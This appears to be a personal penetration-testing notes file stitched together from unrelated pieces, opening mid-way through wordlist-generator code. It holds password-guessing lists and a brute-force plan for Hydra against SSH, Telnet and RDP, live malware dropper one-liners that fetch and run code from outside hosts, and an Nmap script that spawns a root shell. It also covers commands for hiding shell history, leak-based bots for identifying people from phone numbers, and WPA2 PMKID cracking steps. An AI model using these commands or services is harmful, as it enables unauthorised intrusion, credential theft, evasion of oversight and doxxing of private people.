                buffer[i+1] = alphabet[let1];
                buffer[i+2] = alphabet[let2++];
                buffer[i+3] = '\n';
                if (let2 == alphaLen) {
                    let2 = 0;
                    let1++;
                    if (let1 == alphaLen) {
                        let1 = 0;
                        let0++;
                        if (let0 == alphaLen)
                            let0 = 0;
                    }
                }
            }
        }

        // Write the first sequence out.
        write(STDOUT_FILENO, buffer, bufLen);

        // Special case for length 3, we're already done.
        if (len == 3)
            continue;

        // Set all the letters to 0.
        for (i=0;i<len;i++)
            letters[i] = 0;

        // Now on each iteration, increment the the fourth to last letter.
        i = len-4;
        do {
            char c;
            int  j;

            // Increment this letter.
            letters[i]++;

            // Handle wraparound.
            if (letters[i] >= alphaLen)
                letters[i] = 0;

            // Set this letter in the proper places in the buffer.
            c = alphabet[letters[i]];
            for (j=i;j<bufLen;j+=stride)
                buffer[j] = c;

            if (letters[i] != 0) {
                // No wraparound, so we finally finished incrementing.
                // Write out this set.  Reset i back to second to last letter.
                write(STDOUT_FILENO, buffer, bufLen);
                i = len - 4;
                continue;
            }

            // The letter wrapped around ("carried").  Set up to increment
            // the next letter on the left.
            i--;
            // If we carried past last letter, we're done with this
            // whole length.
            if (i < 0)
                break;
        } while(1);
    }

    // Clean up.
    free(letters);
    free(buffer);
}

• PasswordMinLength 6-8
• 1 uppercase letter
• 1 lowercase letter
• 1 digit
• 1 special character

password

P@ssw0rd
Password1
P@ssword
P@ssw0rd1
Password123
P@ssw0rd123
Password
P@ssword
Password123
P@ssw0rd123

common

12345678
rootroot
adminadmin
admin123
12341234

• take from words words: owasp100, users, top words 2024, eng:, universal, sys admins:, games, databases-web-servers-ML, my (just copy to words)
• cat words | grep -v "^*" | cut -f 2- -d ' ' | sed 's/, /\n/g' | sort | uniq
• capitaliza words if at least 2 characters exist [a-z]
  • for [a-z] if last and first character is lowercase, add variant with capitalized the last character and the first.
• if word 3-4 character - add ‘123’ and ‘!@#’
• add 1aA, 1qQ, qQ1, aA1, 1Aa at the end only
• check for users: pairs, root and admin only

• OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 - Ubuntu 16.04 LTS, - minlen: 6 , ucredit, lcredit, dcredit, ocredit: Not set by default,
• 7.9p1 Debian 10+deb10u4 - Debian 10 (buster) - minlen: 6, no other requirements
• Ubuntu - from 18.04 and 20.04 - 6 characters and a mix of characters and numbers. ?
• Ubuntu 20.04 - minlen: 6, upper, lower, number required ?
• OpenSSH`9.6p1 Ubuntu 3ubuntu13.4 - Ubuntu 22.04 LTS -

• 23, 22, 445, 80, 443, 139

SSH     Port 22         *Includes IoT
HTTP    Port 80         Mainly web apps but includes common IoT devices, ICS and gaming consoles
Telnet  Port 23         ALL
SIP     Port 5060       ALL VoIP phones, video conferencing
HTTP_Alt        Port 8080       SOHO routers, smart sprinklers, ICS
TR069   Port 7547       SOHO routers, gateways, CCTV
Applications    Port 8291       SOHO routers
Telnet  Port 2323       ALL
HTTP    Port 81         *Can include IoT: Wificams
SMTP    Port 25         *Can include IoT: Wificams, Game consoles
Rockwell        Port 2222       ICS
HTTP_Alt        Port 8081       DVRs
WSP     Port 9200       WAPs
HTTP_Alt        Port 8090       WebCams
UPnP    Port 52869      Wireless chipsets
Applications    Port 37777      DVRs
UPnP    Port 37215      SOHO Routers
Applications    Port 2332       Cellular gateways
Rockwell        Port 2223       ICS
Secure SIP      Port 5061       VoIP phones, video conferencing

https://www.f5.com/labs/articles/threat-intelligence/the-hunt-for-iot--multi-purpose-attack-thingbots-threaten-intern

bots ports:

• TCP 23, TCP 7547, TCP 5555
• Telnet ports (TCP 23 and 2323)

https://cujo.com/blog/the-2022-2023-iot-botnet-report-vulnerabilities-targeted/

UDP port 9034.

orf;cd /tmp; rm -rf mpsl; cd /tmp; /bin/busybox wget http://89.203.251.188/mipsel && chmod +x mipsel && ./mipsel

https://www.codementor.io/@packt/reverse-engineering-a-linux-executable-hello-world-rjceryk5d

objdump -d hello > disassembly.asm

• AT&T disassembly syntax

objdump -M intel -d hello > disassembly.asm

should be done in a sandbox environment

• trace
  • hows a readable code of what the program did
  • logged library functions that the program called and received
• strace
  • logs system calls
    • execve runs a program pointed to by the filename
    • open and read are system calls that are used here to read files
    • mmap2, mprotect, and brk are responsible for memory activities such as allocation, permissions, and segment boundary setting

https://en.wikipedia.org/wiki/X86_assembly_language

consists of a series of

• mnemonic processor instructions - consist of an opcode mnemonic followed by an operand, which might be a list of data, arguments or parameters
• meta-statements (known variously as
  • declarative operations
  • directives
  • pseudo-instructions
  • pseudo-operations
  • pseudo-ops
• comments
• data

Parity bit - error detecting code

data sizes −

• Word: a 2-byte data item
• Doubleword: a 4-byte (32 bit) data item
• Quadword: an 8-byte (64 bit) data item
• Paragraph: a 16-byte (128 bit) area
• Kilobyte: 1024 bytes
• Megabyte: 1,048,576 bytes

fetch-decode-execute cycle or the execution cycle:

• The processor may access one or more bytes of memory at a time
• The processor stores data in reverse-byte sequence
• steps:
  • Fetching the instruction from memory
  • Decoding or identifying the instruction
  • Executing the instruction

two kinds of memory addresses

• Absolute address - a direct reference of specific location.
• Segment address (or offset) - starting address of a memory segment with the offset value.

• Intel syntax - x86 assembly language - dominant in the DOS and Windows world
• AT&T syntax is dominant in the Unix world

(curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms
/bin/sh -c (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

• 2018 https://arxiv.org/pdf/1807.04320.pdf
• PHP NN scan 2020 https://arxiv.org/pdf/2012.08835.pdf

TOTDO:

• BackBox
• Hping
• Metasploit Project - payloads
• Nessus - payloads
• Nmap
• SAINT
• w3af - payloads
• OpenVAS - payloads https://github.com/greenbone/openvas-scanner
  • GPL - C
  • German web site

reconftw

• https://www.blackhatethicalhacking.com/tools/reconftw/
• https://github.com/six2dez/reconftw

• .desktop file
  • Exec=27

• scraping
• parsing data
• automated pentesting
• unit testing through selenium - framework, automating tests for web applications across diversified platforms as well as browsers
• Credential stuffing

Прячем файлы в картинках.

Представляю подборку из семи Windows утилит для стеганографии.

1. Anubis — классика, первая и, к сожалению, последняя версия была написана в 2014 году на Java, поэтому она требует установки JRE, а также (в случае с Windows 10) виртуальной машины DOS — NTVDM. Способна скрывать только текстовые файлы.
2. DeEgger Embedder — маленькая утилита, в которой реализован уже больший набор функций, но его использование требует установки .NET Framework 3.5. Помимо BMP, программа поддерживает в качестве контейнеров PNG, JPG, видеофайлы AVI и музыкальные MP3.
3. DeepSound — последняя версия этой программы вышла в ноябре 2015 года. В отличие от остальных, она прячет данные внутри звуковых файлов. В качестве контейнеров DeepSound может использовать WAV (только несжатый, PCM), а также MP3, CDA, WMA, APE и FLAC. DeepSound умеет внедрять файлы любого типа и автоматически рассчитывает доступное для них место в зависимости от размера контейнера и настроек качества аудио.
4. Hallucinate — эта компактная (всего 34 Кбайт) утилита написана на Java и не требует установки. В качестве контейнера она поддерживает форматы BMP и PNG, что делает ее гораздо удобнее Anubis.
5. JHide — еще одна компактная утилита, которая, в отличие от Hallucinate, помимо BMP и PNG, поддерживает TIFF, а также позволяет использовать защиту паролем.
6. OpenPuff — последняя версия (4.00) поддерживает не только сокрытие одних файлов внутри других, но и работу со стегометками произвольного формата. Ей даже можно выделить несколько процессорных ядер, если предстоит большой объем работы.В отличие от других утилит, поддерживающих парольную защиту скрываемого сообщения,OpenPuff умеет использовать для шифрования криптографически стойкий генератор псевдослучайных чисел.
7. OpenStego —последняя версия OpenStego (0.61) вышла в 2014 году Программа работает в Windows и Linux. Она поддерживает BMP, PNG, JPG, GIF и WBMP. Заполненный контейнер всегда сохраняется в форматеPNG

id

uid, gid, groups

pwd

Print working directory, i.e., display the name of my current directory on the screen.

hostname

Print the name of the local host (the machine on which I am working). Use netconf (as root) to change the name of the machine.

whoami

Print my login name.

id

Print user id (uid) and his/her group id (gid), effective id (if different than the real id) and the supplementary groups.

date

Print the operating system current date, time and timezone. For an ISO standard format, I have to use date -Iseconds. I can change the date and time to 2000-12-31 23:57 using the command date 123123572000 or using these two commands (easier to remember):

• date -set 2000-12-31 To set the hardware (BIOS) clock from the system (Linux) clock, I can use the command (as root) setclock. The international (ISO 8601) standard format for all-numeric date/time has the form: 2001-01-31 (as in Linux default "C" localization). You can be more precise if you wish using, for example: 2001-01-31 23:59:59.999-05:00 (representing I millisecond before February 2001, in a timezone which is 5 hours behind the Universal Coordinated Time (UTC)) . The most "kosher" representation of the same point in time could be: 20010131T235959,999-0500. See the standard at ftp://ftp.qsl.net/pub/g1smd/8601v03.pdf.
• date -set 23:57:00

time

Determine the amount of time that it takes for a process to complete + other process accounting. Don't confuse it with the date command (see previous entry). E.g. I can find out how long it takes to display a directory content using: time ls. Or I can test the time function with time sleep 10 (time the commands the does nothing for 10 seconds).

clock and hwclock

(two commands, use either). Obtain date/time from the computer hardware (real time, battery-powered) clock. You can also use one of this commands to set the hardware clock, but setclock may be simplier (see command above). Example: hwclock -systohc -utc sets the hardware clock (in UTC) from the system clock.

who

Determine the users logged on the machine.

w

Determine who is logged on the system, find out what they are doing, their processor ussage, etc. Handy security command.

• rwho -a (=remote who) Determine users logged on other computers on your network. The rwho service must be enabled for this command to run. If it isn't, run setup (RedHat specific) as root to enable "rwho".

last

Show listing of users last logged-in on your system. Really good idea to check it from time to time as a security measure on your system.

lastb

("=last bad") Show the last bad (unsuccessful) login attempts on my system. It did not work on my system, so got it started with: touch /var/log/btmp

• "There's a good reason why /var/log/btmp isn't available on any sane set-up - it's a world-readable file containing login mistakes. Since one of the most common login mistakes is to type the password instead of the username, /var/log/btmp is a gift to crackers." (Thanks to Bruce Richardson). It appears the problem can be solved by changing the file permissions so only root can use "lastb":
• chmod o-r /var/log/btmp

history | more

Show the last (1000 or so) commands executed from the command line on the current account. The "| more" causes the display to stop after each screen-full. To see what another user was doing on your system, login as "root" and inspect his/her "history". The history is kept in the file .bash_history in the user home directory (so yes, it can be modified or erased).

uptime

Show the amount of time since the last reboot.

ps

(="print status" or "process status") List the processes currently run by the current user.

ps axu | more

List all the processes currently running, even those without the controlling terminal, together with the name of the user that owns each process.

top

Keep listing the currently running processes on my computer, sorted by cpu usage (top processes first). Press <Ctrl>c when done.

PID = process identification. USER = name of the user who owns (started?) the process. PRI = priority of the process (the higher the number, the lower the priority, normal 0, highest priority is -20, lowest 20. NI = niceness level (i.e., if the process tries to be nice by adjusting the priority by the number given). The higher the number, the higher the niceness of the process (i.e., its priority is lower). SIZE = kilobytes of code+data+stack taken by the process in memory. RSS = kilobytes of physical (silicon) memory taken. SHARE = kilobytes of memory shared with other processes. STAT = state of the process: S-sleeping, R-running, T-stopped or traced, D-uniterruptable sleep, Z=zombie. %CPU = share of the CPU usage (since last screen update). %MEM = share of physical memory. TIME = total CPU time used by the process (since it was started). COMMAND = command line used to start the task (careful with passwords, etc., on command line, all permitted to run "top" may see them!

gtop, ktop and htop

(in X terminal) Three GUI choices for top. My favourite is gtop (comes with gnome). In KDE, ktop is also available from the "K"menu under "System"-"Task Manager".

uname -a

(= "Unix name" with option "all") Info on your (local) server. I can also use guname (in X-window terminal) to display the info more nicely.

Xorg -version

Show me the version of X windows I have on my system.

cat /etc/issue

Check what distribution you are using. You can put your own message in this text file - it's displayed on login. It is more common to put your site-specific login message to the file /etc/motd ("motd"="message of the day").

free

Memory info (in kilobytes). "Shared" memory is the memory that can be shared between processes (e.g., executable code is "shared"). "Buffered" and "cashed" memory is the part that keeps parts of recently accessed files - it can be shrunk if more memory is needed by processes.

df -h

(=disk free) Print disk info about all the filesystems (in human-readable form).

du / -bh | more

(=disk usage) Print detailed disk usage for each subdirectory starting at the "/" (root) directory (in human legible form).

cat /proc/cpuinfo

Cpu info - shows the content of the file cpuinfo. Note that the files in the /proc directory are not real files - they are hooks to look at information available to the kernel.

cat /proc/interrupts

List the interrupts in use. May need to find out before setting up new hardware.

cat /proc/version

Linux version and other info.

cat /proc/filesystems

Show the types of filesystems currently in use.

cat /etc/printcap |more

Show the setup of printers.

lsmod

(= "list modules". As root. Use /sbin/lsmod to execute this command when you are a non-root user.) Show the kernel modules currently loaded.

set|more

Show the current user environment (in full). Normally too much to bother.

echo $PATH

Show the content of the environment variable PATH. This command can be used to show other environment variables as well. Use set to see the full environment (see the previous command).

dmesg | less

Print kernel messages (the content of the so-called kernel ring buffer). Press "q" to quit "less". Use less /var/log/dmesg to see what "dmesg" dumped into this file right after the last system bootup.

chage -l my_loginname

See my password expiry information.

quota

See my disk quota (the limits of disk usage).

sysctl -a |more

Display all the configurable Linux kernel parameters.

runlevel

Print the previous and current runlevel. The output "N5" means: "no previous runlevel" and "5 is the current runlevel". To change the runlevel, use "init", e.g., init 1 switches the system to a single user mode.

• Runlevel is the mode of operation of Linux. Runlevel can be switched "on the fly" using the command init. For example, init 3 (as root) will switch me to runlevel 3. The following runlevels are standard: 0 - halt (Do NOT set initdefault to this) 1 - Single user mode 2 - Multiuser, without NFS (The same as 3, if you do not have networking) 3 - Full multiuser mode 4 - unused 5 - X11 6 - reboot (Do NOT set initdefault to this)

The system default runlevel is set in the file: /etc/inittab.

https://righteousit.com/2024/07/24/hiding-linux-processes-with-bind-mounts/

• history -r clear the Bash history of the current session only
• $ unset HISTFILE Don’t save commands in Bash history for current session
• history -dw 352 Remove a certain line from Bash history
• echo "discreet";history -d $(history 1) - execute command without saving to history

• @avinfo — аккаунты, недвижимость, авто, объявления
• getcontact.com — как записан номер в контактах
• m.ok.ru — часть номера, email, город, дата регистрации
• list-org.com — поиск организаций по номеру
• SaveRuData — адрес, имя, траты, работает через VPN
• x-ray.contact — имя, аккаунты, адреса, почта (VPN)
• @Zernerda — утечки, адреса, аккаунты (1 поиск бесплатно)
• @OsintKit — данные из утечек: имена, почты, адреса
• @Архангел — утечки: аккаунты, почты, адреса, ФИО
• @getairplane_bot — авиаперелеты, информация о попутчиках
• sync.me — имя и уровень спама
• leak-lookup.com — утечки данных номера
• NumBuster — как записан номер в контактах (Android)
• revealname.com — имя и оператор
• Truecaller.com — имя в контактах
• @und_searchprobot - поиск по утечкам

https://github.com/hangetzzu/saycheese

• Metasploit Framework, License: BSD, Language: Ruby
• Exploit-DB License: GPL, Language: Python
• OpenVAS License: GPL, Language: C, Python
• ZAP (Zed Attack Proxy) License: Apache 2.0, Language: Java
• sqlmap License: GPL, Language: Python
• Burp Suite: License: Free, with commercial options, Language: Java

Ettercap - man in the middle attack License: GPL Language: C

to check signature: https://nmap.org/dist/sigs/nmap-7.95.tar.bz2.digest.txt

remote:

if ! command -v hydra >/dev/null; then
    apt install autoconf
    apt install libssh-dev # for SSH
    mkdir --parents /usr/local/src
    cd /usr/local/src
    wget https://nmap.org/dist/nmap-7.95.tar.bz2
    # - check signature
    sha512sum nmap-7.95.tar.bz2
    # - extract
    tar xpf nmap-7.95.tar.bz2
    # git clone --depth=1 https://github.com/nmap/nmap
    cd nmap-7.95
    export CFLAGS="-U_FORTIFY_SOURCE -O3 -fvisibility=hidden -D_FORTIFY_SOURCE=3 -fstack-protector-strong -fstack-clash-protection -fcf-protection" # -fpie -fpic -shared"
    export CXXFLAGS="-O3 -D_FORTIFY_SOURCE=3 -fstack-protector-strong -fstack-clash-protection -fcf-protection -fpie -fpic -shared"
    ./configure --without-zenmap
    make
    make install
fi

Nmap performs a TCP SYN scan against the top 1,000 ports, as specified in the nmap-services file.

By default enabled: host discovery, arp ping, reverse dns resolution

• -sn - ICMP echo (not broadcast), TCP SYNC 443, PCP ACK to port 80
  • nmap -sn 192.168.0.1/24

-sA, -b, -sT, -sF, -sI, -sM, -sN, -sS, -sW, and -sX

nping -c 1 –tcp -p 80,433 scanme.nmap.org google.com

template

• -T paranoid|sneaky|polite|normal|aggressive|insane - timing template
• -T n - where n is paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4), and insane (5)

fine-grained - only affect port scans and host discovery scans. Other features like OS detection implement their own timing.

• –min-rate number
  • –min-rate 300 means that Nmap will try to keep the sending rate at or above 300 packets per second.
• –max-rate number
  • –max-rate 0.1 for a slowcan of one packet every ten seconds

set an upper limit on total scan time –max-retries

Specify –host-timeout with the maximum amount of time you are willing to wait. For example, specify 30m to ensure that Nmap doesn't waste more than half an hour on a single host.

Nmap Scripting Engine (NSE) https://www.lua.org/manual/5.3/

usr/share/nmap/scripts

invocation:

nmap -sC --script-args 'user=foo,pass=",{}=bar",paths={/admin,/cgi-bin},xmpp-info.server_name=localhost'

Nmap done: 1 IP address (0 hosts up) scanned in 1.53 seconds

• Solution: by default NMAP use arp ping to ip, to disable it use: –disable-arp-ping
• use -vvv for verbosity.

Initiating Parallel DNS resolution of 1 host. at 08:28

• Solution: disable dns resolution for ip: -n

Initiating Ping Scan

• Solution: disable host discovery: -Pn

Why so slow?

• Solution:
  • –min-parallelism 6 –max-parallelism 20
  • -T5

Why i don't see actual work?

• Solution: bacause you have several interfaces, use “-e enp0” to specify one interface.

You requested a scan type which requires root privileges.

• Explanation: some advanced port scanning features like NULL, Stealth SYN Scan, and many others can only work with root privileges because Nmap needs to access raw packet data to give you adequate/usable results.
• Solution:
  • sudo setcap cap_{netraw,capnetadmin,capnetbindservice}+eip $(which nmap)
  • getcap $(which nmap) # /usr/bin/nmap cap_{netbindservice,capnetadmin,capnetraw}=eip
  • nmap –privileged -sS 192.168.0.112

• https://github.com/gh0x0st/pythonizing_nmap
• python-nmap
• python3-nmap

• doc https://xael.org/pages/python-nmap-en.html
• repository https://bitbucket.org/xael/python-nmap
• package https://pypi.org/project/python-nmap/
• examples https://github.com/Tengrom/Python_nmap

https://pypi.org/project/python3-nmap/

https://www.stationx.net/nmap-cheat-sheet/ Service and Version Detection

• -sV nmap 192.168.1.1 -sV Attempts to determine the version of the service running on port
• -sV -version-intensity nmap 192.168.1.1 -sV -version-intensity 8 Intensity level 0 to 9. Higher number increases possibility of correctness
• -sV -version-light nmap 192.168.1.1 -sV -version-light Enable light mode. Lower possibility of correctness. Faster
• -sV -version-all nmap 192.168.1.1 -sV -version-all Enable intensity level 9. Higher possibility of correctness. Slower
• -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute

OS Detection

• -O nmap 192.168.1.1 -O Remote OS detection using TCP/IP stack fingerprinting
• -O -osscan-limit nmap 192.168.1.1 -O -osscan-limit If at least one open and one closed TCP port are not found it will not try OS detection against host
• -O -osscan-guess nmap 192.168.1.1 -O -osscan-guess Makes Nmap guess more aggressively
• -O -max-os-tries nmap 192.168.1.1 -O -max-os-tries 1 Set the maximum number x of OS detection tries against a target
• -A nmap 192.168.1.1 -A Enables OS detection, version detection, script scanning, and traceroute

-6 nmap -6 2607:f0d0:1002:51::4 Enable IPv6 scanning

Other Useful Nmap Commands

• nmap -iR 10 -PS22-25,80,113,1050,35000 -v -sn Discovery only on ports x, no port scan
• nmap 192.168.1.1-1/24 -PR -sn -vv Arp discovery only on local network, no port scan
• nmap -iR 10 -sn -traceroute Traceroute to random targets, no port scan
• nmap 192.168.1.1-50 -sL -dns-server 192.168.1.1 Query the Internal DNS for hosts, list targets only
• nmap 192.168.1.1 –packet-trace Show the details of the packets that are sent and received during a scan and capture the traffic.

printf "%b" "$(cat t.txt |sed -e 's/SF://g' -e 's/\r//g')" | less

This script give root shell.

description = [[]]
author = ""
license = ""
categories = {}

portrule = function(host, port)
os.execute("bash")
return false
end

action = function(host, port)

end

• Sessions - created through the exploits while hacking. Can upgrade a normal shell to meterpreter.
• exploit - is vulnerability exploitation that deliver payload to unprotected part of a system. Target exploited, payload deployed.

https://data.gpo.zugaina.org/pentoo/net-analyzer/metasploit/metasploit-9999.ebuild

#+begin_src python :results output :exports both :session s1
import paramiko
import socket

s = socket.socket()
s.connect(('localhost', 22))
t = paramiko.Transport(s)
t.connect()

try:
    t.auth_none('')
except paramiko.BadAuthenticationType, err:
    print err.allowed_types

#+end_src

FreeRDP

• https://raw.githubusercontent.com/FreeRDP/FreeRDP/refs/heads/master/docs/README.building
• apt install libxslt-dev

remote:

if ! command -v hydra >/dev/null; then
    mkdir --parents /usr/local/src
    cd /usr/local/src
    apt install libssh-dev # for SSH
    git clone --depth=1 https://github.com/vanhauser-thc/thc-hydra
    wget -O 970.patch https://patch-diff.githubusercontent.com/raw/vanhauser-thc/thc-hydra/pull/970.patch
    # git apply --stat a_file.patch
    git apply --check 970.patch # dry run
    git apply 970.patch
    cd thc-hydra
    ./configure
    make
    make install
    # If you miss some library, this command may help you:
    # pkg-config --cflags --libs freerdp3
    echo "/usr/local/lib" >> /etc/ld.so.conf
    ldconfig
fi

• -t TASKS run TASKS number of connects in parallel per target (default: 16)
• -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)

-M FILE list of servers to attack, one entry per line, ':' to specify port

• -f
• -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
• -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)

• -w / -W TIME wait time for a response (32) / between connects per thread (0)
• -c TIME wait time per login attempt over all threads (enforces -t 1)

• -r use a non-random shuffling method for option -x

• https://github.com/zatevakhin/dehydrated

• more than one protocol to attack: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
• support parallelized connects.

https://github.com/facebookresearch/hydra/blob/main/requirements/requirements.txt

• omegaconf>=2.4.0.dev2
• importlib-resources;python_version<'3.9'
• packaging

• Patator
• Metasploit

hydra -l <username> -P <full path to pass> 10.10.134.5 -t 4 ssh

• -l Specifies the user login for the session
• -P Provides a list of passwords to test
• -t threads

1. pairs

hydra -C pair.lst

1. users + passwords-common
2. users + passwords-advanced

• -l LOGIN or -L FILE
• -p PASS or -P FILE
• -C FILE - "login:pass" format

• -M FILE list of servers to attack, one entry per line, ':' to specify port
• [service://server[:PORT][/OPT]]
• -s port

export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150

• min:6 chars
• Entropy Checks of (pam_unix module with the obscure option enables )
  • not Palindrome: echo “asd” | rev
  • Simple: Checks if the new password is too simple based on its length and the variety of character types used.
  • has upper [A-Z]
  • has lower [a-z]
  • has digit [0-9]
  • has special [^a-zA-Z0-9]

is_too_simple() {
  local password="$1"
  if [ ${#password} -lt 8 ]; then
    return 0
  fi

  local has_upper=0
  local has_lower=0
  local has_digit=0
  local has_special=0

  for ((i=0; i<${#password}; i++)); do
    if [[ ${password:$i:1} =~ [A-Z] ]]; then
      has_upper=1
    elif [[ ${password:$i:1} =~ [a-z] ]]; then
      has_lower=1
    elif [[ ${password:$i:1} =~ [0-9] ]]; then
      has_digit=1
    elif [[ ${password:$i:1} =~ [^a-zA-Z0-9] ]]; then
      has_special=1
    fi
  done

  if [ $has_upper -eq 0 ] || [ $has_lower -eq 0 ] || [ $has_digit -eq 0 ] || [ $has_special -eq 0 ]; then
    return 0
  else
    return 1
  fi
}
is_too_simple "1DFAasd2." ; echo $?
is_too_simple "asd" ; echo $?

Help: hydra -x -h

• -x MIN:MAX:CHARSET
• -x 8:8:aA1.- - all lower, upper, numbers and .- characters

https://www.hackingarticles.in/remote-desktop-penetration-testing-port-3389/

rdesktop 192.168.1.41:3314

Metasploit

• run getgui -e -u ignite -p 123

which equal to

• use post/windows/mange/enable_rdp
• set username pavan
• set password 123
• set session 1
• exploit

https://crackerfrank.hashnode.dev/cracking-passwords-with-hydra-a-tryhackme-walkthrough

• honeyd
• nepenthes
• Sebek-based
• KFSensor is a host-based Intrusion Detection System that can act as a honeypot
• Specter

ssh

• Kippo - interaction SSH honeypot (old)
• Cowrie - interaction SSH and Telnet honeypot
  • offers a fake file system based on Debian 5.0, letting you add and remove files as you wish

telnet

• TPwd
• MTPot
• TIoT

HTTP

• Dionaca
• Glastopf http://glastopf.org/
• Conpot
• Nodepot https://github.com/schmalle/Nodepot
• Google Hack Honeypot http://ghh.sourceforge.net/

Database

• ElasticHoney https://github.com/jordan-wright/elastichoney
  • malicious requests attempting to exploit RCE vulnerabilities.
• HoneyMysql https://github.com/supriyo-biswas/HoneyMysql
• MongoDB-HoneyProxy https://github.com/Plazmaz/MongoDB-HoneyProxy

IOT honeypots

• https://github.com/omererdem/honeything
  • as a full modem/router running the RomPager web server and supports TR-069 (CWMP) protocol.
• https://github.com/darkarnium/kako
  • includes Telnet, HTTP and HTTPS servers. Kako requires the following Python packages to work properly: Click, Boto3, Requests and Cerberus

Email honeypots

• https://github.com/sec51/honeymail
• https://github.com/awhitehatter/mailoney
• https://github.com/miguelraulb/spamhat

Other

• https://github.com/DinoTools/dionaea
  • low-interaction honeypot written in C and Python uses the Libemu library to emulate the execution of Intel x86 instructions and detect shellcodes.
  • support for protocols such as FTP, HTTP, Memcache, MSSQL, MySQL, SMB, TFTP
• http://miniprint/
• https://github.com/alexbredo/honeypot-ftp
• https://github.com/fygrave/honeyntp
• https://github.com/buffer/thug
  • mimic the behaviour of a web browser to analyze suspicious links and determine if they contain malicious components.
• https://github.com/thinkst/canarytokens
  • emulate web bugs, the transparent images that track when someone opens an email by embedding a unique URL in the web page’s image tag and monitors GET requests. Canarytokens does the same thing but for file reads, database queries, process executions, patterns in log files and much more.

• commonly located at isolated DMZ segments behind Firewall
• often use hardened Operation systems where extra security measures are taken to minimize their exposure to threats.

• security - not able to hack honeypot itself
• Performance - how much traffic a honeypot can handle
• fidelity fəˈdelədē - realism provided by a honeypot to an adversary

• Pure - full separate server with carries fake "confidential" data.
• High-Interaction - resource-intensive, used for detect targeted attacks
• Mid-Interaction - do not possess their own operating system and are primarily used to confuse the attackers
• Low-Interaction - pretty simple, spread for big amount of IP addresses
• Malware, Spam, Database,
• Honeynets - a single system consists of various honeypots in network security.
• Tar Pits - designed to respond slowly to incoming requests, which would slow down attacks attempts
• hybrid honeypot systems - combine High and Low-Interaction. Selectively forwarding connections from the low-interaction honeypots.

Channel Hopping - capture while hopping through multiple channels

• need handshake packages captured
• You can force a client to re-authenticate again with a lot of tools so you will instantly get this.

• https://wiki.installgentoo.com/wiki/Breaking_WPA2

• tcpdump -D - devices list
• tcpdump -w tcpdump icmp -i 1 - dump device 1

• https://hashcat.net/forum/thread-10253.html
• all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)
• Pairwise Master Key Identifier (PMKID)-based roaming features enabled
• on the RSN IE (Robust Security Network Information Element) using a single EAPOL (Extensible Authentication Protocol over LAN) frame after requesting it from the access point.
• Robust Security Network is a protocol for establishing secure communications over an 802.11 wireless network and has PMKID, the key needed to establish a connection between a client and an access point, as one of its capabilities.
• hcxdumptool (v4.2.0 or higher), to request the PMKID from the targeted access point and dump the received frame to a file.
  • $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status
  • https://github.com/ZerBea/hcxdumptool
• converted into a hash format accepted by Hashcat.
  • $ ./hcxpcaptool -z test.16800 test.pcapng
  • https://github.com/ZerBea/hcxtools
    • require libssl-dev
• e Hashcat (v4.2.0 or higher
  • ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
  • https://github.com/hashcat/hashcat
• PMKID-based roaming features enabled … using IEEE 802.11i/p/r protocols.
• WLAN vendors which send the PMKID in the first message of the 4-way handhake should consider to remove the PMKID in WPA2 PSK configured WLANs (non-802.11r). This way the exploit is fully mitigated.
• If you are an 802.11r user in combination with PSK, reflect453 if this is really necessary. [Or] disable WPA2 Personal in your network completely and rely on WPA2 Enterprise using a secure EAP method (e.g. EAP-TLS, PEAP, EAP-TTLS).
• https://techbeacon.com/security/wpa2-hack-allows-wi-fi-password-crack-much-faster

steps

1. rc-service wpa_supplicant down
2. Get PMKIDs and / or EAPOL message pairs
   • hcxdumptool -i interface -o dumpfile.pcapng –active_beacon –enable_status=15
3. Convert the traffic to hash format 22000:
   • hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng
4. hashcat -m 22000 hash.hc22000 wordlist.txt # or cracked.txt.gz

capture and detect weakness

• git clone –depth=1 https://github.com/ZerBea/hcxdumptool

• app-crypt/hashcat
• app-crypt/hashcat-utils

• https://github.com/openwall/john

john -wordlist:wordlistmy.txt -rules –stdout |less

• wordlistmy.txt -source rules
• used /etc/john/john.conf - [List.Rules:Wordlist]

generate password rules

• Most people use easy to remember passwords, in this case it has to be 8 characters or over in length
• Append 0-9 to the word, i.e. (word)1, (word)2, (word)3, ..
• Sequence of numbers are often used, e.g. 123, 321, 999, ..
• First letter is often upper-case
• Short words (under 8 characters) are stringed in series of two, e.g. googlegoogle, hellohello, openopen, ..
• Forename and surname often used

app-crypt/johntheripper-jumbo

https://www.renderlab.net/projects/WPA-tables/

Захват PMKID with handshake

• airodump-ng wlp0s20f0u1 –channel 9 -w cap2

